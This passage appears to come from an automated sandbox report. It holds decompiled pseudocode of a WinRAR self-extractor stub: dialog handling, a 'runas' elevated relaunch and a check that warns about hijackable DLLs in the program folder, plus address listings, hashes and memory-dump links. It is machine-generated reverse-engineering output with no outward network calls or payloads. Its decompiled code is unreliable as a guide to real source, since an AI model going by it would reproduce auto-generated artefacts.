										SendMessageW(_t279, 0xb1, 0, 0xffffffff);
										SendMessageW(_t279, 0xc2, 0, 0xda22e4);
										_t312 = 0x800;
									}
									SetFocus(_t279);
									__eflags =  *0xdb85f8;
									if( *0xdb85f8 == 0) {
										E00D7FAB1(_t321 - 0x1164, _t321 - 0x2164, _t312);
										E00D8C10F(_t285, _t321 - 0x1164, _t312);
										E00D73E41(_t321 - 0x4288, 0x880, E00D7DA42(_t285, 0xb9), _t321 - 0x1164);
										_t323 = _t323 + 0x10;
										_t163 = _t321 - 0x4288;
									} else {
										_t163 = E00D7DA42(_t285, 0xba);
									}
									E00D8C190(0, _t163);
									__eflags =  *0xdb9601;
									if( *0xdb9601 == 0) {
										E00D8C7FC(_t321 - 0x2164);
									}
									_push(0);
									_push(_t321 - 0x2164);
									 *(_t321 + 0x17) = 0;
									_t166 = E00D79D3A(0, _t321);
									_t277 = 1;
									__eflags = _t166;
									if(_t166 != 0) {
										L40:
										_t300 = E00D89A8D(_t321 - 0x2164);
										 *((char*)(_t321 + 0x13)) = _t300;
										__eflags = _t300;
										if(_t300 != 0) {
											L43:
											_t169 =  *(_t321 + 0x17);
											L44:
											_t285 =  *0xdb9601;
											__eflags = _t285;
											if(_t285 != 0) {
												L50:
												__eflags =  *((char*)(_t321 + 0x13));
												if( *((char*)(_t321 + 0x13)) != 0) {
													 *0xdb75dc = _t277;
													E00D712B2(_t302, 0x67, 0);
													E00D712B2(_t302, 0x66, 0);
													SetDlgItemTextW(_t302, _t277, E00D7DA42(_t285, 0xe6)); // executed
													E00D712B2(_t302, 0x69, _t277);
													SetDlgItemTextW(_t302, 0x65, 0xda22e4); // executed
													_t315 = GetDlgItem(_t302, 0x65);
													__eflags = _t315;
													if(_t315 != 0) {
														_t195 = GetWindowLongW(_t315, 0xfffffff0) | 0x00000080;
														__eflags = _t195;
														SetWindowLongW(_t315, 0xfffffff0, _t195);
													}
													_push(5);
													_push( *0xdb75e0);
													_push(_t302);
													E00D8B4C7(_t300);
													_push(2);
													_push( *0xdb75e0);
													_push(_t302);
													E00D8B4C7(_t300);
													_push(0xdcce18);
													_push(_t302);
													 *0xdcfe3c = _t277; // executed
													E00D8C6FF(_t285, __eflags); // executed
													_push(6);
													_push( *0xdb75e0);
													 *0xdcfe3c = 0;
													_push(_t302);
													E00D8B4C7(_t300);
													__eflags =  *0xdb75d7;
													if( *0xdb75d7 == 0) {
														__eflags =  *0xdb75cc;
														if( *0xdb75cc == 0) {
															__eflags =  *0xdcde2c;
															if( *0xdcde2c == 0) {
																_push(4);
																_push( *0xdb75e0);
																_push(_t302);
																E00D8B4C7(_t300);
															}
														}
													}
													E00D71294(_t302, _t277, _t277);
													 *0xdb75dc =  *0xdb75dc & 0x00000000;
													__eflags =  *0xdb75dc;
													_t182 =  *0xdb75d7; // 0x1
													goto L75;
												}
												__eflags = _t285;
												_t169 = (_t169 & 0xffffff00 | _t285 != 0x00000000) - 0x00000001 &  *(_t321 + 0x17);
												__eflags = _t169;
												L52:
												__eflags = _t169;
												 *(_t321 + 0x17) = _t169 == 0;
												__eflags = _t169;
												if(_t169 == 0) {
													L66:
													__eflags =  *(_t321 + 0x17);
													if( *(_t321 + 0x17) != 0) {
														_push(E00D7DA42(_t285, 0x9a));
														E00D73E41(_t321 - 0x5688, 0xa00, L"\"%s\"\n%s", _t321 - 0x2164);
														E00D76E03(0xdb00e0, _t277);
														E00D89735(_t302, _t321 - 0x5688, E00D7DA42(0xdb00e0, 0x96), 0x30);
														 *0xdb75cc =  *0xdb75cc + 1;
													}
													L12:
													_push(0);
													goto L13;
												}
												GetModuleFileNameW(0, _t321 - 0x1164, 0x800);
												_t285 = 0xdbb602;
												E00D7E7AA(0xdbb602, _t321 - 0x164, 0x80);
												_push(0xdba602);
												E00D73E41(_t321 - 0x11ca0, 0x430c, L"-el -s2 \"-d%s\" \"-sp%s\"", _t321 - 0x2164);
												_t323 = _t323 + 0x14;
												 *(_t321 - 0x48) = 0x3c;
												 *((intOrPtr*)(_t321 - 0x44)) = 0x40;
												 *((intOrPtr*)(_t321 - 0x38)) = _t321 - 0x1164;
												 *((intOrPtr*)(_t321 - 0x34)) = _t321 - 0x11ca0;
												 *(_t321 - 0x40) = _t302;
												 *((intOrPtr*)(_t321 - 0x3c)) = L"runas";
												 *(_t321 - 0x2c) = _t277;
												 *((intOrPtr*)(_t321 - 0x28)) = 0;
												 *((intOrPtr*)(_t321 - 0x30)) = 0xdb75f8;
												_t317 = CreateFileMappingW(0xffffffff, 0, 0x8000004, 0, 0x7104, L"winrarsfxmappingfile.tmp");
												 *(_t321 + 8) = _t317;
												__eflags = _t317;
												if(_t317 == 0) {
													 *(_t321 + 0x10) =  *(_t321 + 0x14);
												} else {
													 *0xdc5d08 = 0;
													_t231 = GetCommandLineW();
													__eflags = _t231;
													if(_t231 != 0) {
														E00D7FAB1(0xdc5d0a, _t231, 0x2000);
													}
													E00D8A24E(_t285, 0xdc9d0a, 7);
													E00D8A24E(_t285, 0xdcad0a, 2);
													E00D8A24E(_t285, 0xdcbd0a, 0x10);
													 *0xdcce0b = _t277;
													_t285 = 0xdccd0a;
													E00D7E90C(_t277, 0xdccd0a, _t321 - 0x164);
													 *(_t321 + 0x10) = MapViewOfFile(_t317, 2, 0, 0, 0);
													E00D8EA80(_t238, 0xdc5d08, 0x7104);
													_t323 = _t323 + 0xc;
												}
												_t220 = ShellExecuteExW(_t321 - 0x48);
												E00D7E957(_t321 - 0x164, 0x80);
												E00D7E957(_t321 - 0x11ca0, 0x430c);
												__eflags = _t220;
												if(_t220 == 0) {
													_t319 =  *(_t321 + 0x10);
													 *(_t321 + 0x17) = _t277;
													goto L64;
												} else {
													 *0xdadf20( *(_t321 - 0x10), 0x2710);
													_t71 = _t321 + 0xc;
													 *_t71 =  *(_t321 + 0xc) & 0x00000000;
													__eflags =  *_t71;
													_t319 =  *(_t321 + 0x10);
													while(1) {
														__eflags =  *_t319;
														if( *_t319 != 0) {
															break;
														}
														Sleep(0x64);
														_t230 =  *(_t321 + 0xc) + 1;
														 *(_t321 + 0xc) = _t230;
														__eflags = _t230 - 0x64;
														if(_t230 < 0x64) {
															continue;
														}
														break;
													}
													 *0xdcde2c =  *(_t321 - 0x10);
													L64:
													__eflags =  *(_t321 + 8);
													if( *(_t321 + 8) != 0) {
														UnmapViewOfFile(_t319);
														CloseHandle( *(_t321 + 8));
													}
													goto L66;
												}
											}
											__eflags = _t300;
											if(_t300 == 0) {
												goto L52;
											}
											E00D73E41(_t321 - 0x1164, 0x800, L"__tmp_rar_sfx_access_check_%u", GetTickCount());
											_t323 = _t323 + 0x10;
											E00D7943C(_t321 - 0x3188);
											 *(_t321 - 4) =  *(_t321 - 4) & 0x00000000;
											_push(0x11);
											_push(_t321 - 0x1164);
											_t246 = E00D79528(_t321 - 0x3188);
											 *((char*)(_t321 + 0x13)) = _t246;
											__eflags = _t246;
											if(_t246 == 0) {
												_t247 = GetLastError();
												__eflags = _t247 - 5;
												if(_t247 == 5) {
													 *(_t321 + 0x17) = _t277;
												}
											}
											_t39 = _t321 - 4;
											 *_t39 =  *(_t321 - 4) | 0xffffffff;
											__eflags =  *_t39;
											_t169 = E00D7946E(_t321 - 0x3188); // executed
											_t285 =  *0xdb9601;
											goto L50;
										}
										_t248 = GetLastError();
										_t300 =  *((intOrPtr*)(_t321 + 0x13));
										__eflags = _t248 - 5;
										if(_t248 != 5) {
											goto L43;
										}
										_t169 = _t277;
										 *(_t321 + 0x17) = _t169;
										goto L44;
									} else {
										_t249 = GetLastError();
										__eflags = _t249 - 5;
										if(_t249 == 5) {
											L39:
											 *(_t321 + 0x17) = _t277;
											goto L40;
										}
										__eflags = _t249 - 3;
										if(_t249 != 3) {
											goto L40;
										}
										goto L39;
									}
								} else {
									_t277 = 1;
									_t182 = 1;
									 *0xdb75d7 = 1;
									L75:
									__eflags =  *0xdb75cc;
									if( *0xdb75cc <= 0) {
										goto L26;
									}
									__eflags = _t182;
									if(_t182 != 0) {
										goto L26;
									}
									 *0xdb75d0 = _t277;
									SetDlgItemTextW(_t302, _t277, E00D7DA42(_t285, 0x90));
									_t290 =  *0xdb00e0; // 0x0
									__eflags = _t290 - 9;
									if(_t290 != 9) {
										__eflags = _t290 - 3;
										_t189 = ((0 | _t290 != 0x00000003) - 0x00000001 & 0x0000000a) + 0x97;
										__eflags = _t189;
										 *(_t321 + 0x14) = _t189;
										_t316 = _t189;
									} else {
										_t316 = 0xa0;
									}
									_t190 = E00D7DA42(_t290, 0x96);
									E00D89735(_t302, E00D7DA42(_t290, _t316), _t190, 0x30);
									goto L125;
								}
							}
							_t277 = 1;
							__eflags =  *0xdb75d1;
							if( *0xdb75d1 == 0) {
								goto L26;
							}
							goto L25;
						}
						__eflags =  *0xdcfe3c;
						if( *0xdcfe3c == 0) {
							goto L23;
						} else {
							__eflags =  *0xdcfe3d;
							_t254 = _t149 & 0xffffff00 |  *0xdcfe3d == 0x00000000;
							__eflags = _t254;
							 *0xdcfe3d = _t254;
							_t255 = E00D7DA42((0 | _t254 != 0x00000000) + 0xe6, (0 | _t254 != 0x00000000) + 0xe6);
							_t277 = 1;
							SetDlgItemTextW(_t302, 1, _t255);
							while(1) {
								__eflags =  *0xdcfe3d;
								if( *0xdcfe3d == 0) {
									goto L125;
								}
								__eflags =  *0xdb75d7;
								if( *0xdb75d7 != 0) {
									goto L125;
								}
								_t259 = GetMessageW(_t321 - 0x64, 0, 0, 0);
								__eflags = _t259;
								if(_t259 == 0) {
									goto L125;
								} else {
									_t261 = IsDialogMessageW(_t302, _t321 - 0x64);
									__eflags = _t261;
									if(_t261 == 0) {
										TranslateMessage(_t321 - 0x64);
										DispatchMessageW(_t321 - 0x64);
									}
									continue;
								}
							}
							goto L125;
						}
					}
					_t266 = _t149 - 1;
					__eflags = _t266;
					if(_t266 == 0) {
						_t277 = 1;
						__eflags =  *0xdb75dc;
						 *0xdb75d7 = 1;
						if( *0xdb75dc == 0) {
							goto L12;
						}
						__eflags =  *0xdb75cc;
						if( *0xdb75cc != 0) {
							goto L125;
						}
						goto L12;
					}
					__eflags = _t266 == 0x65;
					if(_t266 == 0x65) {
						_t270 = E00D71217(_t302, E00D7DA42(_t285, 0x64), _t321 - 0x1164);
						__eflags = _t270;
						if(_t270 != 0) {
							SetDlgItemTextW(_t302, 0x66, _t321 - 0x1164);
						}
						goto L1;
					}
					goto L7;
				}
				L1:
				_t116 = 1;
				goto L126;
			}























































              0x00d8a5d1
              0x00d8a5d1
              0x00d8a5d6
              0x00d8a5e0
              0x00d8a5e6
              0x00d8a5ea
              0x00d8a5ee
              0x00d8a607
              0x00d8a611
              0x00d8a611
              0x00d8a617
              0x00d8acb3
              0x00d8acb8
              0x00d8acbf
              0x00d8acc0
              0x00d8acc6
              0x00d8accc
              0x00d8acce
              0x00d8acd8
              0x00d8acd8
              0x00d8acde
              0x00d8ace3
              0x00d8ace5
              0x00d8acf2
              0x00d8acf2
              0x00d8ad01
              0x00d8ad10
              0x00d8ad13
              0x00d8ad25
              0x00d8ad2d
              0x00d8ad2f
              0x00d8ad37
              0x00d8ad39
              0x00d8ad3c
              0x00d8ad41
              0x00d8ad43
              0x00d8ad43
              0x00d8ad4b
              0x00d8ad52
              0x00d8ad57
              0x00d8ad5c
              0x00d8ad61
              0x00d8ad66
              0x00d8ad67
              0x00d8ad6e
              0x00d8ad73
              0x00d8ad75
              0x00d8ad77
              0x00d8ad77
              0x00d8ad7d
              0x00d8ad84
              0x00d8ad86
              0x00d8ad88
              0x00d8ad8e
              0x00d8ad8f
              0x00d8ad8f
              0x00d8ad94
              0x00d8ad9b
              0x00d8adab
              0x00d8adbe
              0x00d8adbe
              0x00d8adc4
              0x00d8adcb
              0x00d8ae7c
              0x00d8ae7c
              0x00d8ae83
              0x00d8af2c
              0x00d8af2c
              0x00d8af33
              0x00d8af38
              0x00d8af38
              0x00d8af3e
              0x00d8af45
              0x00d8af4c
              0x00d8af56
              0x00d8af56
              0x00d8af5b
              0x00d8af60
              0x00d8af62
              0x00d8af64
              0x00d8af6b
              0x00d8af6d
              0x00d8af6f
              0x00d8af70
              0x00d8af75
              0x00d8af76
              0x00d8af78
              0x00d8af82
              0x00d8af7a
              0x00d8af7a
              0x00d8af7a
              0x00d8af78
              0x00d8af6b
              0x00d8af88
              0x00d8af8f
              0x00d8af9e
              0x00d8af9e
              0x00000000
              0x00d8af8f
              0x00d8ae89
              0x00d8ae90
              0x00000000
              0x00000000
              0x00d8ae96
              0x00d8ae9d
              0x00000000
              0x00000000
              0x00d8aea3
              0x00d8aea5
              0x00d8aeaa
              0x00d8aeb1
              0x00d8aeb1
              0x00d8aeb7
              0x00d8aec2
              0x00d8aec2
              0x00d8aec8
              0x00d8aed3
              0x00d8aee4
              0x00d8aefc
              0x00000000
              0x00d8aefc
              0x00d8aeca
              0x00d8aed1
              0x00000000
              0x00000000
              0x00000000
              0x00d8aed1
              0x00d8aeb9
              0x00d8aec0
              0x00000000
              0x00000000
              0x00000000
              0x00d8af01
              0x00d8af01
              0x00d8af02
              0x00d8af02
              0x00d8af0a
              0x00d8af24
              0x00d8af29
              0x00000000
              0x00d8add1
              0x00d8add1
              0x00d8add3
              0x00d8add9
              0x00d8adda
              0x00d8addf
              0x00d8ade4
              0x00d8ade6
              0x00d8ade8
              0x00d8adef
              0x00d8adf1
              0x00d8ae05
              0x00d8ae10
              0x00d8ae15
              0x00d8ae15
              0x00d8adef
              0x00d8ae16
              0x00d8ae1c
              0x00d8ae6f
              0x00d8ae6f
              0x00d8ae70
              0x00d8ae76
              0x00d8ae77
              0x00000000
              0x00d8ae1e
              0x00d8ae1f
              0x00d8ae25
              0x00d8ae2b
              0x00000000
              0x00000000
              0x00d8ae2d
              0x00d8ae34
              0x00000000
              0x00000000
              0x00d8ae36
              0x00d8ae38
              0x00d8ae3e
              0x00d8ae3f
              0x00d8ae44
              0x00d8ae4b
              0x00000000
              0x00000000
              0x00d8ae61
              0x00d8ae67
              0x00d8ae69
              0x00d8a75d
              0x00d8a75d
              0x00d8a763
              0x00d8a763
              0x00d8a687
              0x00d8a688
              0x00d8afa4
              0x00d8afa4
              0x00d8afa6
              0x00d8afac
              0x00d8afb6
              0x00d8afb6
              0x00000000
              0x00d8ae69
              0x00d8ae1c
              0x00d8adcb
              0x00d8a61d
              0x00d8a620
              0x00d8a634
              0x00d8a634
              0x00000000
              0x00d8a634
              0x00d8a625
              0x00d8a625
              0x00d8a628
              0x00d8a693
              0x00d8a69a
              0x00d8a732
              0x00d8a732
              0x00d8a742
              0x00d8a748
              0x00d8a74f
              0x00d8a769
              0x00d8a770
              0x00d8a784
              0x00d8a78a
              0x00d8a791
              0x00d8a793
              0x00d8a7a5
              0x00d8a7b4
              0x00d8a7b6
              0x00d8a7b6
              0x00d8a7bc
              0x00d8a7c2
              0x00d8a7c9
              0x00d8a7e6
              0x00d8a7f3
              0x00d8a816
              0x00d8a81b
              0x00d8a81e
              0x00d8a7cb
              0x00d8a7d0
              0x00d8a7d0
              0x00d8a827
              0x00d8a82c
              0x00d8a833
              0x00d8a83c
              0x00d8a83c
              0x00d8a841
              0x00d8a84b
              0x00d8a84c
              0x00d8a84f
              0x00d8a85c
              0x00d8a85d
              0x00d8a85f
              0x00d8a872
              0x00d8a87e
              0x00d8a880
              0x00d8a883
              0x00d8a885
              0x00d8a898
              0x00d8a898
              0x00d8a89b
              0x00d8a89b
              0x00d8a8a1
              0x00d8a8a3
              0x00d8a912
              0x00d8a912
              0x00d8a916
              0x00d8ab5a
              0x00d8ab60
              0x00d8ab6a
              0x00d8ab82
              0x00d8ab88
              0x00d8ab95
              0x00d8aba0
              0x00d8aba2
              0x00d8aba4
              0x00d8abaf
              0x00d8abaf
              0x00d8abb8
              0x00d8abb8
              0x00d8abbe
              0x00d8abc0
              0x00d8abc6
              0x00d8abc7
              0x00d8abcc
              0x00d8abce
              0x00d8abd4
              0x00d8abd5
              0x00d8abda
              0x00d8abdf
              0x00d8abe0
              0x00d8abe6
              0x00d8abeb
              0x00d8abed
              0x00d8abf3
              0x00d8abfa
              0x00d8abfb
              0x00d8ac00
              0x00d8ac07
              0x00d8ac09
              0x00d8ac10
              0x00d8ac12
              0x00d8ac19
              0x00d8ac1b
              0x00d8ac1d
              0x00d8ac23
              0x00d8ac24
              0x00d8ac24
              0x00d8ac19
              0x00d8ac10
              0x00d8ac2c
              0x00d8ac31
              0x00d8ac31
              0x00d8ac38
              0x00000000
              0x00d8ac38
              0x00d8a91c
              0x00d8a923
              0x00d8a923
              0x00d8a926
              0x00d8a926
              0x00d8a928
              0x00d8a92c
              0x00d8a92e
              0x00d8aaf0
              0x00d8aaf0
              0x00d8aaf4
              0x00d8ab04
              0x00d8ab1d
              0x00d8ab2b
              0x00d8ab45
              0x00d8ab4a
              0x00d8ab4a
              0x00d8a685
              0x00d8a685
              0x00000000
              0x00d8a685
              0x00d8a942
              0x00d8a953
              0x00d8a959
              0x00d8a95e
              0x00d8a97b
              0x00d8a980
              0x00d8a983
              0x00d8a990
              0x00d8a997
              0x00d8a9a0
              0x00d8a9b8
              0x00d8a9bb
              0x00d8a9c2
              0x00d8a9c5
              0x00d8a9c8
              0x00d8a9d5
              0x00d8a9d7
              0x00d8a9da
              0x00d8a9dc
              0x00d8aa67
              0x00d8a9e2
              0x00d8a9e2
              0x00d8a9e9
              0x00d8a9ef
              0x00d8a9f1
              0x00d8a9fe
              0x00d8a9fe
              0x00d8aa0a
              0x00d8aa16
              0x00d8aa22
              0x00d8aa2d
              0x00d8aa34
              0x00d8aa39
              0x00d8aa57
              0x00d8aa5a
              0x00d8aa5f
              0x00d8aa5f
              0x00d8aa6e
              0x00d8aa82
              0x00d8aa93
              0x00d8aa98
              0x00d8aa9a
              0x00d8aad4
              0x00d8aad7
              0x00000000
              0x00d8aa9c
              0x00d8aaa4
              0x00d8aaaa
              0x00d8aaaa
              0x00d8aaaa
              0x00d8aaae
              0x00d8aab1
              0x00d8aab1
              0x00d8aab4
              0x00000000
              0x00000000
              0x00d8aab8
              0x00d8aac1
              0x00d8aac2
              0x00d8aac5
              0x00d8aac8
              0x00000000
              0x00000000
              0x00000000
              0x00d8aac8
              0x00d8aacd
              0x00d8aada
              0x00d8aada
              0x00d8aade
              0x00d8aae1
              0x00d8aaea
              0x00d8aaea
              0x00000000
              0x00d8aade
              0x00d8aa9a
              0x00d8a8a5
              0x00d8a8a7
              0x00000000
              0x00000000
              0x00d8a8c1
              0x00d8a8c6
              0x00d8a8cf
              0x00d8a8d4
              0x00d8a8de
              0x00d8a8e0
              0x00d8a8e7
              0x00d8a8ec
              0x00d8a8ef
              0x00d8a8f1
              0x00d8a8f3
              0x00d8a8f5
              0x00d8a8f8
              0x00d8a8fa
              0x00d8a8fa
              0x00d8a8f8
              0x00d8a8fd
              0x00d8a8fd
              0x00d8a8fd
              0x00d8a907
              0x00d8a90c
              0x00000000
              0x00d8a90c
              0x00d8a887
              0x00d8a889
              0x00d8a88c
              0x00d8a88f
              0x00000000
              0x00000000
              0x00d8a891
              0x00d8a893
              0x00000000
              0x00d8a861
              0x00d8a861
              0x00d8a863
              0x00d8a866
              0x00d8a86d
              0x00d8a86f
              0x00000000
              0x00d8a86f
              0x00d8a868
              0x00d8a86b
              0x00000000
              0x00000000
              0x00000000
              0x00d8a86b
              0x00d8a772
              0x00d8a774
              0x00d8a775
              0x00d8a777
              0x00d8ac3d
              0x00d8ac3d
              0x00d8ac44
              0x00000000
              0x00000000
              0x00d8ac4a
              0x00d8ac4c
              0x00000000
              0x00000000
              0x00d8ac57
              0x00d8ac65
              0x00d8ac6b
              0x00d8ac71
              0x00d8ac74
              0x00d8ac7f
              0x00d8ac89
              0x00d8ac89
              0x00d8ac8e
              0x00d8ac91
              0x00d8ac76
              0x00d8ac76
              0x00d8ac76
              0x00d8ac9a
              0x00d8aca8
              0x00000000
              0x00d8aca8
              0x00d8a770
              0x00d8a753
              0x00d8a754
              0x00d8a75b
              0x00000000
              0x00000000
              0x00000000
              0x00d8a75b
              0x00d8a6a0
              0x00d8a6a7
              0x00000000
              0x00d8a6ad
              0x00d8a6ad
              0x00d8a6b4
              0x00d8a6b9
              0x00d8a6bb
              0x00d8a6ca
              0x00d8a6d2
              0x00d8a6d5
              0x00d8a724
              0x00d8a724
              0x00d8a72b
              0x00d8a72d
              0x00d8a72d
              0x00d8a6dd
              0x00d8a6e4
              0x00000000
              0x00000000
              0x00d8a6f3
              0x00d8a6f9
              0x00d8a6fb
              0x00000000
              0x00d8a701
              0x00d8a706
              0x00d8a70c
              0x00d8a70e
              0x00d8a714
              0x00d8a71e
              0x00d8a71e
              0x00000000
              0x00d8a70e
              0x00d8a6fb
              0x00000000
              0x00d8a724
              0x00d8a6a7
              0x00d8a62a
              0x00d8a62a
              0x00d8a62d
              0x00d8a668
              0x00d8a669
              0x00d8a670
              0x00d8a676
              0x00000000
              0x00000000
              0x00d8a678
              0x00d8a67f
              0x00000000
              0x00000000
              0x00000000
              0x00d8a67f
              0x00d8a62f
              0x00d8a632
              0x00d8a64b
              0x00d8a650
              0x00d8a652
              0x00d8a65e
              0x00d8a65e
              0x00000000
              0x00d8a652
              0x00000000
              0x00d8a632
              0x00d8a609
              0x00d8a60b
              0x00000000

              APIs
              • __EH_prolog.LIBCMT ref: 00D8A5D6
                • Part of subcall function 00D712D7: GetDlgItem.USER32(00000000,00003021), ref: 00D7131B
                • Part of subcall function 00D712D7: SetWindowTextW.USER32(00000000,00DA22E4), ref: 00D71331
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: H_prologItemTextWindow
              • String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
              • API String ID: 810644672-1650746426
              • Opcode ID: 3266545388c963d1a257dad3de5166078cf303f30e24fb18e2cf1d6babd30ba4
              • Instruction ID: 9e20c4fe12a33e4073dd357d56f93ef3b71a94ab187b72b113ee2a22c287f096
              • Opcode Fuzzy Hash: 3266545388c963d1a257dad3de5166078cf303f30e24fb18e2cf1d6babd30ba4
              • Instruction Fuzzy Hash: 6E42E070944345EFEB21AB689C8AFBA3BADEF02700F084156F646E62D1DB745944CB72
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D7FD49, Relevance: 51.1, APIs: 22, Strings: 7, Instructions: 314libraryfileloaderCOMMON
              Download Yara Rule
              C-Code - Quality: 76%
              			E00D7FD49(void* __edx, char _a3, long _a4, CHAR* _a8, CHAR* _a12, CHAR* _a16, CHAR* _a20, CHAR* _a24, CHAR* _a28, CHAR* _a32, CHAR* _a36, CHAR* _a40, CHAR* _a44, CHAR* _a48, CHAR* _a52, CHAR* _a56, CHAR* _a60, CHAR* _a64, CHAR* _a68, CHAR* _a72, CHAR* _a76, CHAR* _a80, CHAR* _a84, CHAR* _a88, CHAR* _a92, CHAR* _a96, CHAR* _a100, CHAR* _a104, CHAR* _a108, CHAR* _a112, CHAR* _a116, CHAR* _a120, CHAR* _a124, CHAR* _a128, CHAR* _a132, CHAR* _a136, CHAR* _a140, CHAR* _a144, CHAR* _a148, CHAR* _a152, CHAR* _a156, CHAR* _a160, CHAR* _a164, CHAR* _a168, CHAR* _a172, CHAR* _a176, CHAR* _a180, CHAR* _a184, CHAR* _a188, CHAR* _a192, CHAR* _a196, CHAR* _a200, CHAR* _a204, CHAR* _a208, CHAR* _a212, CHAR* _a216, CHAR* _a220, CHAR* _a224, CHAR* _a228, CHAR* _a232, CHAR* _a236, CHAR* _a240, CHAR* _a244, char _a248, char _a252, short _a756, short _a760, char _a768, short _a772, char _a4848, char _a4852, void _a4860, char _a4864, short _a4868, char _a9152, char _a9160, void _a13260, signed char _a46032) {
				char _v1;
				long _v4;
				char* _t118;
				void* _t126;
				int _t130;
				long _t141;
				int _t167;
				_Unknown_base(*)()* _t176;
				_Unknown_base(*)()* _t177;
				signed char _t184;
				struct _SECURITY_ATTRIBUTES* _t195;
				long _t197;
				void* _t198;
				struct HINSTANCE__* _t201;
				signed int _t203;
				signed int _t205;
				void* _t206;
				signed int _t207;
				int _t208;
				void* _t210;

				E00D8D940();
				_push(_t207);
				_a3 = 0;
				_t201 = GetModuleHandleW(L"kernel32");
				if(_t201 == 0) {
					L5:
					_t118 =  *0xdad080; // 0xda2884
					_t208 = _t207 | 0xffffffff;
					_t202 = 0x800;
					_a8 = L"version.dll";
					_a12 = L"DXGIDebug.dll";
					_a16 = L"sfc_os.dll";
					_a20 = L"SSPICLI.DLL";
					_a24 = L"rsaenh.dll";
					_a28 = L"UXTheme.dll";
					_a32 = L"dwmapi.dll";
					_a36 = L"cryptbase.dll";
					_a40 = L"lpk.dll";
					_a44 = L"usp10.dll";
					_a48 = L"clbcatq.dll";
					_a52 = L"comres.dll";
					_a56 = L"ws2_32.dll";
					_a60 = L"ws2help.dll";
					_a64 = L"psapi.dll";
					_a68 = L"ieframe.dll";
					_a72 = L"ntshrui.dll";
					_a76 = L"atl.dll";
					_a80 = L"setupapi.dll";
					_a84 = L"apphelp.dll";
					_a88 = L"userenv.dll";
					_a92 = L"netapi32.dll";
					_a96 = L"shdocvw.dll";
					_a100 = L"crypt32.dll";
					_a104 = L"msasn1.dll";
					_a108 = L"cryptui.dll";
					_a112 = L"wintrust.dll";
					_a116 = L"shell32.dll";
					_a120 = L"secur32.dll";
					_a124 = L"cabinet.dll";
					_a128 = L"oleaccrc.dll";
					_a132 = L"ntmarta.dll";
					_a136 = L"profapi.dll";
					_a140 = L"WindowsCodecs.dll";
					_a144 = L"srvcli.dll";
					_a148 = L"cscapi.dll";
					_a152 = L"slc.dll";
					_a156 = L"imageres.dll";
					_a160 = L"dnsapi.DLL";
					_a164 = L"iphlpapi.DLL";
					_a168 = L"WINNSI.DLL";
					_a172 = L"netutils.dll";
					_a176 = L"mpr.dll";
					_a180 = L"devrtl.dll";
					_a184 = L"propsys.dll";
					_a188 = L"mlang.dll";
					_a192 = L"samcli.dll";
					_a196 = L"samlib.dll";
					_a200 = L"wkscli.dll";
					_a204 = L"dfscli.dll";
					_a208 = L"browcli.dll";
					_a212 = L"rasadhlp.dll";
					_a216 = L"dhcpcsvc6.dll";
					_a220 = L"dhcpcsvc.dll";
					_a224 = L"XmlLite.dll";
					_a228 = L"linkinfo.dll";
					_a232 = L"cryptsp.dll";
					_a236 = L"RpcRtRemote.dll";
					_a240 = L"aclui.dll";
					_a244 = L"dsrole.dll";
					_a248 = L"peerdist.dll";
					if( *_t118 == 0x78) {
						L14:
						GetModuleFileNameW(0,  &_a772, _t202);
						E00D7FAB1( &_a9160, E00D7B943(_t223,  &_a772), _t202);
						_t195 = 0;
						_t203 = 0;
						do {
							if(E00D7A995() < 0x600) {
								_t126 = 0;
								__eflags = 0;
							} else {
								_t126 = E00D7FCFD( *((intOrPtr*)(_t210 + 0x18 + _t203 * 4))); // executed
							}
							if(_t126 == 0) {
								L20:
								_push(0x800);
								E00D7B9B9(_t227,  &_a772,  *((intOrPtr*)(_t210 + 0x1c + _t203 * 4)));
								_t130 = GetFileAttributesW( &_a760); // executed
								if(_t130 != _t208) {
									_t195 =  *((intOrPtr*)(_t210 + 0x18 + _t203 * 4));
									L24:
									if(_v1 != 0) {
										L30:
										_t234 = _t195;
										if(_t195 == 0) {
											return _t130;
										}
										E00D7B98D(_t234,  &_a768);
										if(E00D7A995() < 0x600) {
											_push( &_a9160);
											_push( &_a768);
											E00D73E41( &_a4864, 0x864, L"Please remove %s from %s folder. It is unsecure to run %s until it is done.", _t195);
											_t210 = _t210 + 0x18;
											_t130 = AllocConsole();
											__eflags = _t130;
											if(_t130 != 0) {
												__imp__AttachConsole(GetCurrentProcessId());
												_t141 = E00D92B33( &_a4860);
												WriteConsoleW(GetStdHandle(0xfffffff4),  &_a4860, _t141,  &_v4, 0);
												Sleep(0x2710);
												_t130 = FreeConsole();
											}
										} else {
											E00D7FCFD(L"dwmapi.dll");
											E00D7FCFD(L"uxtheme.dll");
											_push( &_a9152);
											_push( &_a760);
											E00D73E41( &_a4852, 0x864, E00D7DA42(_t185, 0xf1), _t195);
											_t210 = _t210 + 0x18;
											_t130 = E00D89735(0,  &_a4848, E00D7DA42(_t185, 0xf0), 0x30);
										}
										ExitProcess(0);
									}
									_t205 = 0;
									while(1) {
										_push(0x800);
										E00D7B9B9(0,  &_a768,  *((intOrPtr*)(_t210 + 0x3c + _t205 * 4)));
										_t130 = GetFileAttributesW( &_a756);
										if(_t130 != _t208) {
											break;
										}
										_t205 = _t205 + 1;
										if(_t205 < 0x35) {
											continue;
										}
										goto L30;
									}
									_t195 =  *((intOrPtr*)(_t210 + 0x38 + _t205 * 4));
									goto L30;
								}
							} else {
								_t130 = CompareStringW(0x400, 0x1001,  *(_t210 + 0x24 + _t203 * 4), _t208, L"DXGIDebug.dll", _t208); // executed
								_t227 = _t130 - 2;
								if(_t130 != 2) {
									goto L21;
								}
								goto L20;
							}
							L21:
							_t203 = _t203 + 1;
						} while (_t203 < 8);
						goto L24;
					}
